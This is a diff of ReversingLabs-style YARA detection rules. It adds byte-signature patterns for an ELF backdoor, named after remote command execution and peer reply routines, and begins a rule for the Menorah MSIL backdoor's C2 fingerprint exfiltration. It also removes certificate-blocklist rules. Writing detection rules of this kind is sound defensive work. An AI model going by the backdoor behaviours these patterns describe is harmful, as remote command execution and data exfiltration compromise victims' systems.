+            ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ??
+            83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7
+            40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 8D 95 ?? ?? ?? ?? 89 44 24 ?? 89 14 24 E8 ?? ?? ??
+            ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ??
+            ?? ?? ?? 8B 45 ?? 0F B7 40 ?? 66 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 83
+            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 85
+            ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F
+            5D C3
+        }
+		$execute_remote_command_v1 = {
+            55 89 E5 57 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
+            B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 03 45
+            ?? 66 C7 00 ?? ?? C6 40 ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B
+            7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 66 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 0F B7 45 ?? 89 C2 03 55 ?? 8B 45 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ??
+            B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 0F B7 C0 89 45 ?? EB ?? 8B 45
+            ?? 89 04 24 E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 89 C2 03 55 ?? 0F
+            B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
+        }
+		$send_reply_v1_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89
+            45 ?? 8D 85 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            14 24 E8 ?? ?? ?? ?? 8B 55 ?? 0F B6 02 83 E0 ?? 83 C8 ?? 88 02 8B 55 ?? 0F B6 02 83
+            E0 ?? 83 C8 ?? 88 02 8B 45 ?? C6 40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2
+            8B 45 ?? 66 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
+            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E0 ?? 8B 55 ?? 89 C1 83 E1 ?? 0F B6 42 ?? 83
+            E0 ?? 09 C8 88 42 ?? 8B 45 ?? 0F B6 50 ?? 8B 45 ?? 88 50 ?? 8B 45 ?? C6 40 ?? ?? 8B
+            45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? C7 44 24 ?? ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45
+            ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ??
+            ?? 89 45 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 66 89 10 8B 45 ?? 0F B7 10 8B 45 ?? 66 89
+            50 ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ??
+            ?? ?? ?? 66 89 45 ?? 0F B7 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 89 C2 8B 45 ?? 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66
+            89 50 ?? EB ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89
+        }
+		$send_reply_v1_p2 = {
+            50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6
+            42 ?? 83 E0 ?? 88 42 ?? 8B 55 ?? 0F B6 42 ?? 83 E0 ?? 83 C8 ?? 88 42 ?? 8B 45 ?? C6
+            40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B
+            40 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
+            8D 85 ?? ?? ?? ?? 8D 48 ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ??
+            8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44
+            24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ??
+            89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8B
+            45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89
+        }
+		$send_reply_v1_p3 = {
+            41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8D 85 ?? ?? ?? ?? 8D 48
+            ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42
+            ?? 89 41 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 95
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? 39 C2 0F 85 ?? ?? ?? ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 74 ??
+            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 85 C0 75
+            ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 14 C5 ?? ?? ?? ?? B8 ??
+            ?? ?? ?? 29 D0 89 C1 B8 ?? ?? ?? ?? D3 E0 89 45 ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 23
+            45 ?? 89 45 ?? 8B 45 ?? 23 45 ?? 89 45 ?? 8B 45 ?? 3B 45 ?? 75 ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? 83 45 ?? ?? 83 7D ?? ?? 7E ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ??
+            ?? 75 ?? 8B 45 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            8B 0D ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+        }
+		$daemon_already_running_check_v1 = {
+            55 89 E5 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 74 ?? E8
+            ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? EB ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE
+            89 C8 F7 D0 83 E8 ?? 83 C0 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 5F 5D C3
+        }
+		$send_result_to_peer_v2_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89 8D ??
+            ?? ?? ?? 44 89 C0 66 89 95 ?? ?? FF FF 66 89 85 ?? ?? FF FF 48 8D BD ?? ?? ?? ?? BA
+            ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? FF FF
+            ?? ?? 77 ?? 0F B7 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7
+            48 89 D6 FC F3 A4 EB ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7 48 89 D6
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ??
+            89 45 ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 89 50 ?? 48 8B 55 ?? 8B 45 ?? 89 42 ?? 8B
+            45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
+            45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 48 8B 45 ?? 0F
+            B7 10 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 48 98 48 89
+            C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0
+            ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B
+            45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? FF FF ?? ?? 76 ?? 48 8B 45 ?? 48 83 C0 ?? BF
+            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 49 89 C0 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ??
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40
+            ?? ?? ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 0F B7 8D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8B 95
+            ?? ?? ?? ?? 49 89 C0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83 C0 ?? 0F
+        }
+		$send_result_to_peer_v2_p2 = {
+            B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 85 ?? ?? ?? ??
+            66 89 42 ?? 48 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
+            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 50 ?? 48 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D 50 ?? 48
+            8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45
+            ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45
+            ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 48 8B 7D ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 8B 70
+            ?? 41 89 C8 48 89 F9 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48
+            8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ??
+            89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 89
+            C6 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 8B
+            40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 85
+            ?? ?? FF FF 48 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 48 83 C0 ?? 48 8D B5 ?? ?? ?? ?? 8B BD
+            ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? C9 C3
+        }
+		$execute_remote_command_v2 = {
+            55 48 89 E5 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 8B 75 ?? 48 8B 7D ?? E8 ?? ?? ??
+            ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE
+            48 89 C8 48 F7 D0 48 83 E8 ?? 48 03 45 ?? 66 C7 00 ?? ?? C6 40 ?? ?? 48 8B 45 ?? 48
+            C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0
+            48 83 E8 ?? 66 89 45 ?? 48 8B 7D ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            98 48 89 45 ?? 48 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 48 8B 7D
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 48 89 C7 48 03 7D ?? 48 8B 55 ?? BE ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ??
+            B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C0 89 45 ??
+            EB ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 48 89 C2 48
+            03 55 ?? 0F B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 48 8B 7D ?? B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? C9 C3
+        }
+		$main_routine_v2_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 48 8D BD ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48
+            8B BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 48 83 F8 ?? 76 ?? 48 8B 85 ??
+            ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B
+            BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 00 48
+            89 C7 FC 48 89 D1 B8 ?? ?? ?? ?? F3 AA 48 8B 85 ?? ?? ?? ?? 48 8B 00 C7 00 ?? ?? ??
+            ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ??
+            75 ?? E8 ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8D ??
+            ?? ?? ?? 8B 7D ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 79 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 BA ?? ??
+            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 8B 7D ?? B9 ?? ?? ?? ?? BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 7E ?? 48 8D 85 ?? ?? ?? ?? 48 89 45
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89
+        }
+		$main_routine_v2_p2 = {
+            45 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 8B 45 ?? 83
+            C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 8B
+            45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48
+            98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            48 8B 45 ?? 48 83 C0 ?? 48 8D 95 ?? ?? ?? ?? 8B 00 89 02 8B 95 ?? ?? ?? ?? 8B 05 ??
+            ?? ?? ?? 39 C2 74 ?? 8B 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 45 ?? 0F B6
+            40 ?? 0F B6 D0 8B 75 ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 48
+            83 C6 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 55 ?? 48 83 C2 ?? BF ?? ?? ?? ?? 49
+            89 F0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 84 C0 0F 84 ?? ?? ?? ??
+            48 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 48 8B 45 ?? 48 83 C0 ?? 8B 00 89 05 ?? ?? ?? ??
+            48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AA 48 8D 85 ?? ?? ?? ?? 48
+        }
+		$main_routine_v2_p3 = {
+            C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B BD ?? ?? ?? ?? F2 AE
+            48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C8 4C 8D 8D ?? ?? ?? ?? 8B 45 ?? 0F B7 D0 48 8D
+            B5 ?? ?? ?? ?? 8B 7D ?? 41 89 C8 4C 89 C9 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ??
+            0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 75 ?? BE ?? ?? ??
+            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? BA ?? ??
+            ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F
+            B7 D0 48 8B 7D ?? 48 83 C7 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ??
+            0F B7 D0 8B 05 ?? ?? ?? ?? 8D 04 02 89 05 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 50 ?? 0F B7
+            05 ?? ?? ?? ?? 66 39 C2 0F 84 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7
+            05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3
+            AA 8B 15 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8D B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" and 1501577475 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $send_result_to_peer_v1_p* ) ) and ( $execute_remote_command_v1 ) and ( all of ( $send_reply_v1_p* ) ) and ( $daemon_already_running_check_v1 ) ) or ( ( all of ( $send_result_to_peer_v2_p* ) ) and ( $execute_remote_command_v2 ) and ( all of ( $main_routine_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03B630F9645531F8868Dae8Ac0F8Cfe6 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Menorah : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Menorah backdoor."
 		author = "ReversingLabs"
-		id = "be945687-9b8c-5d84-9992-fd317eddae54"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4f13a6c6-bd97-58aa-ac3b-399866b5c63b"
+		date = "2024-05-10"
+		modified = "2024-05-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4968-L4984"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.Menorah.yara#L1-L169"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6d2f4346760bf52a438c4c996e92a2641bebfd536248776383d7c8394e094e6a"
+		logic_hash = "770aefca192ceb3a778c0b1259105ace8e64cb35d0c34acb15c45fb6f22ad94b"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "Menorah"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" and 1594252801 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6F8373Cf89F1B49138F4328118487F9E : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "80c5d205-7f5e-5e06-b490-f33205154974"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4986-L5002"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f926c2f73d47d463721a0cad48d9866192df55d71867941a40cba7e0b7725102"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$send_fingerprint_to_c2_p1 = {
+            28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A
+            73 ?? ?? ?? ?? 19 1F 0E 6F ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 1F 5B 13 ?? 12 ?? 28 ?? ??
+            ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? 1F 5D 13 ??
+            12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 1F 5B 13 ?? 12 ?? 28 ??
+            ?? ?? ?? A2 25 17 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 06 A2 25 19 1F 40 13 ??
+            12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 0D 1F 3F 13 ?? 12
+            ?? 28 ?? ?? ?? ?? 17 16 28 ?? ?? ?? ?? 1F 3D 13 ?? 12 ?? 28 ?? ?? ?? ?? 17 16 28 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 03 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ??
